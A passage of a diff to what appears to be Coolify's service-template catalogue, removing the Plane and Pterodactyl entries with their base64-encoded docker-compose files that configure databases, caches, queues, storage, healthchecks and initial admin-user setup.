bXE6JHtSQUJCSVRNUV9QT1JUOi01NjcyfS9wbGFuZScKICAgICAgQVBJX0tFWV9SQVRFX0xJTUlUOiAnJHtBUElfS0VZX1JBVEVfTElNSVQ6LTYwL21pbnV0ZX0nCiAgICAgIE1JTklPX0VORFBPSU5UX1NTTDogJyR7TUlOSU9fRU5EUE9JTlRfU1NMOi0wfScKICAgICAgUEdIT1NUOiBwbGFuZS1kYgogICAgICBQR0RBVEFCQVNFOiBwbGFuZQogICAgICBQT1NUR1JFU19VU0VSOiAkU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIFBPU1RHUkVTX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICBQT1NUR1JFU19EQjogcGxhbmUKICAgICAgUE9TVEdSRVNfUE9SVDogNTQzMgogICAgICBQR0RBVEE6IC92YXIvbGliL3Bvc3RncmVzcWwvZGF0YQogICAgICBSRURJU19IT1NUOiAnJHtSRURJU19IT1NUOi1wbGFuZS1yZWRpc30nCiAgICAgIFJFRElTX1BPUlQ6ICcke1JFRElTX1BPUlQ6LTYzNzl9JwogICAgICBSRURJU19VUkw6ICcke1JFRElTX1VSTDotcmVkaXM6Ly9wbGFuZS1yZWRpczo2Mzc5L30nCiAgICAgIE1JTklPX1JPT1RfVVNFUjogJFNFUlZJQ0VfVVNFUl9NSU5JTwogICAgICBNSU5JT19ST09UX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9NSU5JTwogICAgICBBV1NfUkVHSU9OOiAnJHtBV1NfUkVHSU9OOi19JwogICAgICBBV1NfQUNDRVNTX0tFWV9JRDogJFNFUlZJQ0VfVVNFUl9NSU5JTwogICAgICBBV1NfU0VDUkVUX0FDQ0VTU19LRVk6ICRTRVJWSUNFX1BBU1NXT1JEX01JTklPCiAgICAgIEFXU19TM19FTkRQT0lOVF9VUkw6ICcke0FXU19TM19FTkRQT0lOVF9VUkw6LWh0dHA6Ly9wbGFuZS1taW5pbzo5MDAwfScKICAgICAgQVdTX1MzX0JVQ0tFVF9OQU1FOiAnJHtBV1NfUzNfQlVDS0VUX05BTUU6LXVwbG9hZHN9JwogICAgICBSQUJCSVRNUV9IT1NUOiBwbGFuZS1tcQogICAgICBSQUJCSVRNUV9QT1JUOiAnJHtSQUJCSVRNUV9QT1JUOi01NjcyfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9VU0VSOiAnJHtTRVJWSUNFX1VTRVJfUkFCQklUTVE6LXBsYW5lfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9QQVNTOiAnJHtTRVJWSUNFX1BBU1NXT1JEX1JBQkJJVE1ROi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfVkhPU1Q6ICcke1JBQkJJVE1RX1ZIT1NUOi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX1ZIT1NUOiAnJHtSQUJCSVRNUV9WSE9TVDotcGxhbmV9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBhcGkKICAgICAgLSBwbGFuZS1kYgogICAgICAtIHBsYW5lLXJlZGlzCiAgICAgIC0gcGxhbmUtbXEKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBlY2hvCiAgICAgICAgLSAnaGV5IHdoYXRzIHVwJwogICAgICBpbnRlcnZhbDogMnMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDE1CiAgbWlncmF0b3I6CiAgICBpbWFnZTogJ2FydGlmYWN0cy5wbGFuZS5zby9tYWtlcGxhbmUvcGxhbmUtYmFja2VuZDoke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgcmVzdGFydDogJ25vJwogICAgY29tbWFuZDogLi9iaW4vZG9ja2VyLWVudHJ5cG9pbnQtbWlncmF0b3Iuc2gKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xvZ3NfbWlncmF0b3I6L2NvZGUvcGxhbmUvbG9ncycKICAgIGVudmlyb25tZW50OgogICAgICBBUFBfUkVMRUFTRTogJyR7QVBQX1JFTEVBU0U6LXYxLjAuMH0nCiAgICAgIFdFQl9VUkw6ICcke1NFUlZJQ0VfRlFETl9QTEFORX0nCiAgICAgIERFQlVHOiAnJHtERUJVRzotMH0nCiAgICAgIENPUlNfQUxMT1dFRF9PUklHSU5TOiAnJHtDT1JTX0FMTE9XRURfT1JJR0lOUzotaHR0cDovL2xvY2FsaG9zdH0nCiAgICAgIEdVTklDT1JOX1dPUktFUlM6ICcke0dVTklDT1JOX1dPUktFUlM6LTF9JwogICAgICBVU0VfTUlOSU86ICcke1VTRV9NSU5JTzotMX0nCiAgICAgIERBVEFCQVNFX1VSTDogJ3Bvc3RncmVzcWw6Ly8kU0VSVklDRV9VU0VSX1BPU1RHUkVTOiRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTQHBsYW5lLWRiL3BsYW5lJwogICAgICBTRUNSRVRfS0VZOiAkU0VSVklDRV9QQVNTV09SRF82NF9TRUNSRVRLRVkKICAgICAgQU1RUF9VUkw6ICdhbXFwOi8vJHtTRVJWSUNFX1VTRVJfUkFCQklUTVF9OiR7U0VSVklDRV9QQVNTV09SRF9SQUJCSVRNUX1AcGxhbmUtbXE6JHtSQUJCSVRNUV9QT1JUOi01NjcyfS9wbGFuZScKICAgICAgQVBJX0tFWV9SQVRFX0xJTUlUOiAnJHtBUElfS0VZX1JBVEVfTElNSVQ6LTYwL21pbnV0ZX0nCiAgICAgIE1JTklPX0VORFBPSU5UX1NTTDogJyR7TUlOSU9fRU5EUE9JTlRfU1NMOi0wfScKICAgICAgUEdIT1NUOiBwbGFuZS1kYgogICAgICBQR0RBVEFCQVNFOiBwbGFuZQogICAgICBQT1NUR1JFU19VU0VSOiAkU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIFBPU1RHUkVTX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICBQT1NUR1JFU19EQjogcGxhbmUKICAgICAgUE9TVEdSRVNfUE9SVDogNTQzMgogICAgICBQR0RBVEE6IC92YXIvbGliL3Bvc3RncmVzcWwvZGF0YQogICAgICBSRURJU19IT1NUOiAnJHtSRURJU19IT1NUOi1wbGFuZS1yZWRpc30nCiAgICAgIFJFRElTX1BPUlQ6ICcke1JFRElTX1BPUlQ6LTYzNzl9JwogICAgICBSRURJU19VUkw6ICcke1JFRElTX1VSTDotcmVkaXM6Ly9wbGFuZS1yZWRpczo2Mzc5L30nCiAgICAgIE1JTklPX1JPT1RfVVNFUjogJFNFUlZJQ0VfVVNFUl9NSU5JTwogICAgICBNSU5JT19ST09UX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9NSU5JTwogICAgICBBV1NfUkVHSU9OOiAnJHtBV1NfUkVHSU9OOi19JwogICAgICBBV1NfQUNDRVNTX0tFWV9JRDogJFNFUlZJQ0VfVVNFUl9NSU5JTwogICAgICBBV1NfU0VDUkVUX0FDQ0VTU19LRVk6ICRTRVJWSUNFX1BBU1NXT1JEX01JTklPCiAgICAgIEFXU19TM19FTkRQT0lOVF9VUkw6ICcke0FXU19TM19FTkRQT0lOVF9VUkw6LWh0dHA6Ly9wbGFuZS1taW5pbzo5MDAwfScKICAgICAgQVdTX1MzX0JVQ0tFVF9OQU1FOiAnJHtBV1NfUzNfQlVDS0VUX05BTUU6LXVwbG9hZHN9JwogICAgICBSQUJCSVRNUV9IT1NUOiBwbGFuZS1tcQogICAgICBSQUJCSVRNUV9QT1JUOiAnJHtSQUJCSVRNUV9QT1JUOi01NjcyfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9VU0VSOiAnJHtTRVJWSUNFX1VTRVJfUkFCQklUTVE6LXBsYW5lfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9QQVNTOiAnJHtTRVJWSUNFX1BBU1NXT1JEX1JBQkJJVE1ROi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfVkhPU1Q6ICcke1JBQkJJVE1RX1ZIT1NUOi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX1ZIT1NUOiAnJHtSQUJCSVRNUV9WSE9TVDotcGxhbmV9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBwbGFuZS1kYgogICAgICAtIHBsYW5lLXJlZGlzCiAgcGxhbmUtZGI6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE1LjctYWxwaW5lJwogICAgY29tbWFuZDogInBvc3RncmVzIC1jICdtYXhfY29ubmVjdGlvbnM9MTAwMCciCiAgICBlbnZpcm9ubWVudDoKICAgICAgUEdIT1NUOiBwbGFuZS1kYgogICAgICBQR0RBVEFCQVNFOiBwbGFuZQogICAgICBQT1NUR1JFU19VU0VSOiAkU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIFBPU1RHUkVTX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICBQT1NUR1JFU19EQjogcGxhbmUKICAgICAgUE9TVEdSRVNfUE9SVDogNTQzMgogICAgICBQR0RBVEE6IC92YXIvbGliL3Bvc3RncmVzcWwvZGF0YQogICAgdm9sdW1lczoKICAgICAgLSAncGdkYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBwbGFuZS1yZWRpczoKICAgIGltYWdlOiAndmFsa2V5L3ZhbGtleTo3LjIuNS1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdyZWRpc2RhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSBwaW5nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBwbGFuZS1tcToKICAgIGltYWdlOiAncmFiYml0bXE6My4xMy42LW1hbmFnZW1lbnQtYWxwaW5lJwogICAgcmVzdGFydDogYWx3YXlzCiAgICBlbnZpcm9ubWVudDoKICAgICAgUkFCQklUTVFfSE9TVDogcGxhbmUtbXEKICAgICAgUkFCQklUTVFfUE9SVDogJyR7UkFCQklUTVFfUE9SVDotNTY3Mn0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfVVNFUjogJyR7U0VSVklDRV9VU0VSX1JBQkJJVE1ROi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfUEFTUzogJyR7U0VSVklDRV9QQVNTV09SRF9SQUJCSVRNUTotcGxhbmV9JwogICAgICBSQUJCSVRNUV9ERUZBVUxUX1ZIT1NUOiAnJHtSQUJCSVRNUV9WSE9TVDotcGxhbmV9JwogICAgICBSQUJCSVRNUV9WSE9TVDogJyR7UkFCQklUTVFfVkhPU1Q6LXBsYW5lfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3JhYmJpdG1xX2RhdGE6L3Zhci9saWIvcmFiYml0bXEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDogJ3JhYmJpdG1xLWRpYWdub3N0aWNzIC1xIHBpbmcnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMzBzCiAgICAgIHJldHJpZXM6IDMKICBwbGFuZS1taW5pbzoKICAgIGltYWdlOiAnZ2hjci5pby9jb29sbGFic2lvL21pbmlvOlJFTEVBU0UuMjAyNS0xMC0xNVQxNy0yOS01NVonCiAgICBjb21tYW5kOiAnc2VydmVyIC9leHBvcnQgLS1jb25zb2xlLWFkZHJlc3MgIjo5MDkwIicKICAgIGVudmlyb25tZW50OgogICAgICBNSU5JT19ST09UX1VTRVI6ICRTRVJWSUNFX1VTRVJfTUlOSU8KICAgICAgTUlOSU9fUk9PVF9QQVNTV09SRDogJFNFUlZJQ0VfUEFTU1dPUkRfTUlOSU8KICAgIHZvbHVtZXM6CiAgICAgIC0gJ3VwbG9hZHM6L2V4cG9ydCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBtYwogICAgICAgIC0gcmVhZHkKICAgICAgICAtIGxvY2FsCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK",
-        "tags": [
-            "plane",
-            "project-management",
-            "tool",
-            "open",
-            "source",
-            "api",
-            "nextjs",
-            "redis",
-            "postgresql",
-            "django",
-            "pm"
-        ],
-        "category": "productivity",
-        "logo": "svgs/plane.svg",
-        "minversion": "0.0.0"
-    },
     "plex": {
         "documentation": "https://docs.linuxserver.io/images/docker-plex/?utm_source=coolify.io",
         "slogan": "Plex organizes video, music and photos from personal media libraries and streams them to smart TVs, streaming boxes and mobile devices.",
@@ -3858,38 +3837,6 @@
         "minversion": "0.0.0",
         "port": "9159"
     },
-    "pterodactyl-panel": {
-        "documentation": "https://pterodactyl.io/?utm_source=coolify.io",
-        "slogan": "Pterodactyl is a free, open-source game server management panel",
-        "compose": "c2VydmljZXM6CiAgbWFyaWFkYjoKICAgIGltYWdlOiAnbWFyaWFkYjoxMS44JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdoZWFsdGhjaGVjay5zaCAtLWNvbm5lY3QgLS1pbm5vZGJfaW5pdGlhbGl6ZWQgfHwgZXhpdCAxJwogICAgICBzdGFydF9wZXJpb2Q6IDEwcwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtIE1ZU1FMX1JPT1RfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfTVlTUUxST09UCiAgICAgIC0gTVlTUUxfREFUQUJBU0U9cHRlcm9kYWN0eWwtZGIKICAgICAgLSBNWVNRTF9VU0VSPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBNWVNRTF9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgdm9sdW1lczoKICAgICAgLSAncHRlcm9kYWN0eWwtZGI6L3Zhci9saWIvbXlzcWwnCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOmFscGluZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncmVkaXMtY2xpIHBpbmcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMKICBwdGVyb2RhY3R5bDoKICAgIGltYWdlOiAnZ2hjci5pby9wdGVyb2RhY3R5bC9wYW5lbDp2MS4xMi4wJwogICAgdm9sdW1lczoKICAgICAgLSAncGFuZWwtdmFyOi9hcHAvdmFyLycKICAgICAgLSAncGFuZWwtbmdpbng6L2V0Yy9uZ2lueC9odHRwLmQvJwogICAgICAtICdwYW5lbC1jZXJ0czovZXRjL2xldHNlbmNyeXB0LycKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vZXRjL2VudHJ5cG9pbnQuc2gKICAgICAgICB0YXJnZXQ6IC9lbnRyeXBvaW50LnNoCiAgICAgICAgbW9kZTogJzA3NTUnCiAgICAgICAgY29udGVudDogIiMhL2Jpbi9zaFxuc2V0IC1lXG5cbiBlY2hvIFwiU2V0dGluZyBsb2dzIHBlcm1pc3Npb25zLi4uXCJcbiBjaG93biAtUiBuZ2lueDogL2FwcC9zdG9yYWdlL2xvZ3MvXG5cbiBVU0VSX0VYSVNUUz0kKHBocCBhcnRpc2FuIHRpbmtlciAtLW5vLWFuc2kgLS1leGVjdXRlPSdlY2hvIFxcUHRlcm9kYWN0eWxcXE1vZGVsc1xcVXNlcjo6d2hlcmUoXCJlbWFpbFwiLCBcIidcIiRBRE1JTl9FTUFJTFwiJ1wiKS0+ZXhpc3RzKCkgPyBcIjFcIiA6IFwiMFwiOycpXG5cbiBpZiBbIFwiJFVTRVJfRVhJU1RTXCIgPSBcIjBcIiBdOyB0aGVuXG4gICBlY2hvIFwiQWRtaW4gVXNlciBkb2VzIG5vdCBleGlzdCwgY3JlYXRpbmcgdXNlciBub3cuXCJcbiAgIHBocCBhcnRpc2FuIHA6dXNlcjptYWtlIC0tbm8taW50ZXJhY3Rpb24gXFxcbiAgICAgLS1hZG1pbj0xIFxcXG4gICAgIC0tZW1haWw9XCIkQURNSU5fRU1BSUxcIiBcXFxuICAgICAtLXVzZXJuYW1lPVwiJEFETUlOX1VTRVJOQU1FXCIgXFxcbiAgICAgLS1uYW1lLWZpcnN0PVwiJEFETUlOX0ZJUlNUTkFNRVwiIFxcXG4gICAgIC0tbmFtZS1sYXN0PVwiJEFETUlOX0xBU1ROQU1FXCIgXFxcbiAgICAgLS1wYXNzd29yZD1cIiRBRE1JTl9QQVNTV09SRFwiXG4gICBlY2hvIFwiQWRtaW4gdXNlciBjcmVhdGVkIHN1Y2Nlc3NmdWxseSFcIlxuIGVsc2VcbiAgIGVjaG8gXCJBZG1pbiBVc2VyIGFscmVhZHkgZXhpc3RzLCBza2lwcGluZyBjcmVhdGlvbi5cIlxuIGZpXG5cbiBleGVjIHN1cGVydmlzb3JkIC0tbm9kYWVtb25cbiIKICAgIGNvbW1hbmQ6CiAgICAgIC0gL2VudHJ5cG9pbnQuc2gKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY3VybCAtc2YgaHR0cDovL2xvY2FsaG9zdDo4MCB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogMXMKICAgICAgcmV0cmllczogMwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSEFTSElEU19TQUxUPSRTRVJWSUNFX1BBU1NXT1JEX0hBU0hJRFMKICAgICAgLSBIQVNISURTX0xFTkdUSD04CiAgICAgIC0gU0VSVklDRV9GUUROX1BURVJPREFDVFlMXzgwCiAgICAgIC0gJ0FETUlOX0VNQUlMPSR7QURNSU5fRU1BSUw6LWFkbWluQGV4YW1wbGUuY29tfScKICAgICAgLSAnQURNSU5fVVNFUk5BTUU9JHtTRVJWSUNFX1VTRVJfQURNSU59JwogICAgICAtICdBRE1JTl9GSVJTVE5BTUU9JHtBRE1JTl9GSVJTVE5BTUU6LUFkbWlufScKICAgICAgLSAnQURNSU5fTEFTVE5BTUU9JHtBRE1JTl9MQVNUTkFNRTotVXNlcn0nCiAgICAgIC0gJ0FETUlOX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9BRE1JTn0nCiAgICAgIC0gJ1BURVJPREFDVFlMX0hUVFBTPSR7UFRFUk9EQUNUWUxfSFRUUFM6LWZhbHNlfScKICAgICAgLSBBUFBfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBBUFBfRU5WSVJPTk1FTlRfT05MWT1mYWxzZQogICAgICAtIEFQUF9VUkw9JFNFUlZJQ0VfRlFETl9QVEVST0RBQ1RZTAogICAgICAtICdBUFBfVElNRVpPTkU9JHtUSU1FWk9ORTotVVRDfScKICAgICAgLSAnQVBQX1NFUlZJQ0VfQVVUSE9SPSR7QVBQX1NFUlZJQ0VfQVVUSE9SOi1hdXRob3JAZXhhbXBsZS5jb219JwogICAgICAtICdMT0dfTEVWRUw9JHtMT0dfTEVWRUw6LWRlYnVnfScKICAgICAgLSBDQUNIRV9EUklWRVI9cmVkaXMKICAgICAgLSBTRVNTSU9OX0RSSVZFUj1yZWRpcwogICAgICAtIFFVRVVFX0RSSVZFUj1yZWRpcwogICAgICAtIFJFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBEQl9EQVRBQkFTRT1wdGVyb2RhY3R5bC1kYgogICAgICAtIERCX1VTRVJOQU1FPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBEQl9IT1NUPW1hcmlhZGIKICAgICAgLSBEQl9QT1JUPTMzMDYKICAgICAgLSBEQl9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgICAtIE1BSUxfRlJPTT0kTUFJTF9GUk9NCiAgICAgIC0gTUFJTF9EUklWRVI9JE1BSUxfRFJJVkVSCiAgICAgIC0gTUFJTF9IT1NUPSRNQUlMX0hPU1QKICAgICAgLSBNQUlMX1BPUlQ9JE1BSUxfUE9SVAogICAgICAtIE1BSUxfVVNFUk5BTUU9JE1BSUxfVVNFUk5BTUUKICAgICAgLSBNQUlMX1BBU1NXT1JEPSRNQUlMX1BBU1NXT1JECiAgICAgIC0gTUFJTF9FTkNSWVBUSU9OPSRNQUlMX0VOQ1JZUFRJT04K",
-        "tags": [
-            "game",
-            "game server",
-            "management",
-            "panel",
-            "minecraft"
-        ],
-        "category": "media",
-        "logo": "svgs/pterodactyl.png",
-        "minversion": "0.0.0",
-        "port": "80"
-    },
-    "pterodactyl-with-wings": {
-        "documentation": "https://pterodactyl.io/?utm_source=coolify.io",
-        "slogan": "Pterodactyl is a free, open-source game server management panel",
-        "compose": "c2VydmljZXM6CiAgbWFyaWFkYjoKICAgIGltYWdlOiAnbWFyaWFkYjoxMS44JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdoZWFsdGhjaGVjay5zaCAtLWNvbm5lY3QgLS1pbm5vZGJfaW5pdGlhbGl6ZWQgfHwgZXhpdCAxJwogICAgICBzdGFydF9wZXJpb2Q6IDEwcwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtIE1ZU1FMX1JPT1RfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfTVlTUUxST09UCiAgICAgIC0gTVlTUUxfREFUQUJBU0U9cHRlcm9kYWN0eWwtZGIKICAgICAgLSBNWVNRTF9VU0VSPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBNWVNRTF9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgdm9sdW1lczoKICAgICAgLSAncHRlcm9kYWN0eWwtZGI6L3Zhci9saWIvbXlzcWwnCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOmFscGluZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncmVkaXMtY2xpIHBpbmcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMKICBwdGVyb2RhY3R5bDoKICAgIGltYWdlOiAnZ2hjci5pby9wdGVyb2RhY3R5bC9wYW5lbDp2MS4xMi4wJwogICAgdm9sdW1lczoKICAgICAgLSAncGFuZWwtdmFyOi9hcHAvdmFyLycKICAgICAgLSAncGFuZWwtbmdpbng6L2V0Yy9uZ2lueC9odHRwLmQvJwogICAgICAtICdwYW5lbC1jZXJ0czovZXRjL2xldHNlbmNyeXB0LycKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vZXRjL2VudHJ5cG9pbnQuc2gKICAgICAgICB0YXJnZXQ6IC9lbnRyeXBvaW50LnNoCiAgICAgICAgbW9kZTogJzA3NTUnCiAgICAgICAgY29udGVudDogIiMhL2Jpbi9zaFxuc2V0IC1lXG5cbiBlY2hvIFwiU2V0dGluZyBsb2dzIHBlcm1pc3Npb25zLi4uXCJcbiBjaG93biAtUiBuZ2lueDogL2FwcC9zdG9yYWdlL2xvZ3MvXG5cbiBVU0VSX0VYSVNUUz0kKHBocCBhcnRpc2FuIHRpbmtlciAtLW5vLWFuc2kgLS1leGVjdXRlPSdlY2hvIFxcUHRlcm9kYWN0eWxcXE1vZGVsc1xcVXNlcjo6d2hlcmUoXCJlbWFpbFwiLCBcIidcIiRBRE1JTl9FTUFJTFwiJ1wiKS0+ZXhpc3RzKCkgPyBcIjFcIiA6IFwiMFwiOycpXG5cbiBpZiBbIFwiJFVTRVJfRVhJU1RTXCIgPSBcIjBcIiBdOyB0aGVuXG4gICBlY2hvIFwiQWRtaW4gVXNlciBkb2VzIG5vdCBleGlzdCwgY3JlYXRpbmcgdXNlciBub3cuXCJcbiAgIHBocCBhcnRpc2FuIHA6dXNlcjptYWtlIC0tbm8taW50ZXJhY3Rpb24gXFxcbiAgICAgLS1hZG1pbj0xIFxcXG4gICAgIC0tZW1haWw9XCIkQURNSU5fRU1BSUxcIiBcXFxuICAgICAtLXVzZXJuYW1lPVwiJEFETUlOX1VTRVJOQU1FXCIgXFxcbiAgICAgLS1uYW1lLWZpcnN0PVwiJEFETUlOX0ZJUlNUTkFNRVwiIFxcXG4gICAgIC0tbmFtZS1sYXN0PVwiJEFETUlOX0xBU1ROQU1FXCIgXFxcbiAgICAgLS1wYXNzd29yZD1cIiRBRE1JTl9QQVNTV09SRFwiXG4gICBlY2hvIFwiQWRtaW4gdXNlciBjcmVhdGVkIHN1Y2Nlc3NmdWxseSFcIlxuIGVsc2VcbiAgIGVjaG8gXCJBZG1pbiBVc2VyIGFscmVhZHkgZXhpc3RzLCBza2lwcGluZyBjcmVhdGlvbi5cIlxuIGZpXG5cbiBleGVjIHN1cGVydmlzb3JkIC0tbm9kYWVtb25cbiIKICAgIGNvbW1hbmQ6CiAgICAgIC0gL2VudHJ5cG9pbnQuc2gKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY3VybCAtc2YgaHR0cDovL2xvY2FsaG9zdDo4MCB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogMXMKICAgICAgcmV0cmllczogMwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSEFTSElEU19TQUxUPSRTRVJWSUNFX1BBU1NXT1JEX0hBU0hJRFMKICAgICAgLSBIQVNISURTX0xFTkdUSD04CiAgICAgIC0gU0VSVklDRV9GUUROX1BURVJPREFDVFlMXzgwCiAgICAgIC0gJ0FETUlOX0VNQUlMPSR7QURNSU5fRU1BSUw6LWFkbWluQGV4YW1wbGUuY29tfScKICAgICAgLSAnQURNSU5fVVNFUk5BTUU9JHtTRVJWSUNFX1VTRVJfQURNSU59JwogICAgICAtICdBRE1JTl9GSVJTVE5BTUU9JHtBRE1JTl9GSVJTVE5BTUU6LUFkbWlufScKICAgICAgLSAnQURNSU5fTEFTVE5BTUU9JHtBRE1JTl9MQVNUTkFNRTotVXNlcn0nCiAgICAgIC0gJ0FETUlOX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9BRE1JTn0nCiAgICAgIC0gJ1BURVJPREFDVFlMX0hUVFBTPSR7UFRFUk9EQUNUWUxfSFRUUFM6LWZhbHNlfScKICAgICAgLSBBUFBfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBBUFBfRU5WSVJPTk1FTlRfT05MWT1mYWxzZQogICAgICAtIEFQUF9VUkw9JFNFUlZJQ0VfRlFETl9QVEVST0RBQ1RZTAogICAgICAtICdBUFBfVElNRVpPTkU9JHtUSU1FWk9ORTotVVRDfScKICAgICAgLSAnQVBQX1NFUlZJQ0VfQVVUSE9SPSR7QVBQX1NFUlZJQ0VfQVVUSE9SOi1hdXRob3JAZXhhbXBsZS5jb219JwogICAgICAtICdMT0dfTEVWRUw9JHtMT0dfTEVWRUw6LWRlYnVnfScKICAgICAgLSBDQUNIRV9EUklWRVI9cmVkaXMKICAgICAgLSBTRVNTSU9OX0RSSVZFUj1yZWRpcwogICAgICAtIFFVRVVFX0RSSVZFUj1yZWRpcwogICAgICAtIFJFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBEQl9EQVRBQkFTRT1wdGVyb2RhY3R5bC1kYgogICAgICAtIERCX1VTRVJOQU1FPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBEQl9IT1NUPW1hcmlhZGIKICAgICAgLSBEQl9QT1JUPTMzMDYKICAgICAgLSBEQl9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgICAtIE1BSUxfRlJPTT0kTUFJTF9GUk9NCiAgICAgIC0gTUFJTF9EUklWRVI9JE1BSUxfRFJJVkVSCiAgICAgIC0gTUFJTF9IT1NUPSRNQUlMX0hPU1QKICAgICAgLSBNQUlMX1BPUlQ9JE1BSUxfUE9SVAogICAgICAtIE1BSUxfVVNFUk5BTUU9JE1BSUxfVVNFUk5BTUUKICAgICAgLSBNQUlMX1BBU1NXT1JEPSRNQUlMX1BBU1NXT1JECiAgICAgIC0gTUFJTF9FTkNSWVBUSU9OPSRNQUlMX0VOQ1JZUFRJT04KICB3aW5nczoKICAgIGltYWdlOiAnZ2hjci5pby9wdGVyb2RhY3R5bC93aW5nczp2MS4xMi4xJwogICAgcmVzdGFydDogdW5sZXNzLXN0b3BwZWQKICAgIHBvcnRzOgogICAgICAtICcyMDIyOjIwMjInCiAgICBlbnZpcm9ubWV